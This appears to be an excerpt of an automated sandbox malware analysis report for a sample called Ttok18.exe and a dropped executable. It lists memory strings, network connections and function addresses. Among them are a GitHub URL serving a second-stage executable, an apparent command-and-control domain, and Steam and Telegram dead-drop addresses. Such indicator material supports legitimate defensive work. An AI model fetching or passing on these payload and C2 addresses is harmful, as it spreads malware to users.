            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: svchost.exe, 00000011.00000003.2174104393.000002A4586C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 00000011.00000003.2174104393.000002A4586C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
            Source: powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Ttok18.exeString found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
            Source: W4OHLX.15.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kresk.lol
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2065346225.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kresk.lol/
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2042357919.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kresk.lol/%
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2042357919.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kresk.lol/a
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://kresk.lolIM7GLNO8
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://kresk.loltosh;
            Source: powershell.exe, 00000004.00000002.1763834008.000000000590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1807167831.00000000058AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000011.00000003.2174104393.000002A4586C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: edb.log.17.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp, Ttok18.exe, 00000000.00000002.1998627591.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
            Source: Ttok18.exe, 00000000.00000002.2001059620.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000000.1992854779.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: Ttok18.exe, 00000000.00000002.2001059620.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000000.1992854779.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drString found in binary or memory: https://t.me/m3wm0w
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0wG
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0wQ
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drString found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 159.69.102.165:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041CB56 CreateDesktopA,memset,memset,CreateProcessA,15_2_0041CB56

            System Summary

            barindex
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess,15_2_00401625
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\Ttok18.exeCode function: 0_2_011E23090_2_011E2309
            Source: C:\Users\user\Desktop\Ttok18.exeCode function: 0_2_011E0A400_2_011E0A40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0296B4984_2_0296B498
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0296B4884_2_0296B488
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02ADB4988_2_02ADB498
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02ADB4888_2_02ADB488
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0339B4A011_2_0339B4A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0339B49011_2_0339B490
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08C03A9811_2_08C03A98
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043E89315_2_0043E893
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C09115_2_0040C091
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E0A115_2_0040E0A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043014115_2_00430141
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E16115_2_0040E161
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044010115_2_00440101
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C11115_2_0042C111
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C12115_2_0040C121
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C1C115_2_0040C1C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004401C115_2_004401C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004121E115_2_004121E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A18115_2_0040A181
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043025115_2_00430251
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C26115_2_0040C261
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A22115_2_0040A221
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C22115_2_0042C221
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E23115_2_0040E231
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004122A115_2_004122A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041235115_2_00412351
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E30115_2_0040E301
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043031115_2_00430311
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044031115_2_00440311
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C32115_2_0042C321
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A33115_2_0040A331
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004103C115_2_004103C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C3C115_2_0042C3C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004123F115_2_004123F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E3F115_2_0040E3F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C38115_2_0040C381
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A41115_2_0040A411
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C42115_2_0040C421
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004104D115_2_004104D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004404D115_2_004404D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004144E115_2_004144E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E4A115_2_0040E4A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004124B115_2_004124B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041057115_2_00410571
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E57115_2_0040E571
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C51115_2_0042C511
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A52115_2_0040A521
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C53115_2_0040C531
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A5C115_2_0040A5C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040E64115_2_0040E641
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044061115_2_00440611
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041062115_2_00410621
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C63115_2_0040C631
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042C6C115_2_0042C6C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004106D115_2_004106D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040C6D115_2_0040C6D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A6B115_2_0040A6B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040A77115_2_0040A771
